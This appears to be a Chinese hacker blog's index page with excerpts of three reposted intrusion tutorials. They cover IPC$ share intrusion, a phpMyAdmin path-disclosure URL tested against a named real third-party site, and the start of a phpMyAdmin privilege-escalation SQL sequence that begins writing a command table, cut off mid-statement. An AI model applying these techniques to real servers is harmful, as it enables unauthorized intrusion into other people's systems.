h4ck3rsbr专题

一份详尽的IPC$资料 转载自:http://hi.baidu.com/h4ck3rsbr/blog/item/bf4282c328b73751b319a89b.html

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑

phpmyadmin爆路径 http://hi.baidu.com/h4ck3rsbr/blog/item/c5642ce9122dc73cb80e2dc0.html

phpmyadmin爆路径 2007年12月09日 星期日 18:10 phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php 测试地址: http://bbs.pjhome.net/phpmyadmin/themes/darkblue_orange/layout.inc.php Fatal e

phpmyadmin的提权 http://hi.baidu.com/h4ck3rsbr/blog/item/725d00f5ca4c9a21bd31094e.html

phpmyadmin的提权 2007年12月21日 星期五 15:05 一: 暴路径: libraries/lect_lang.lib.php themes/darkblue_orange/layout.inc.php 二:提权 选择一个Database.运行以下语句.----start code---Create TABLE a (cmd text NOT NULL);Inser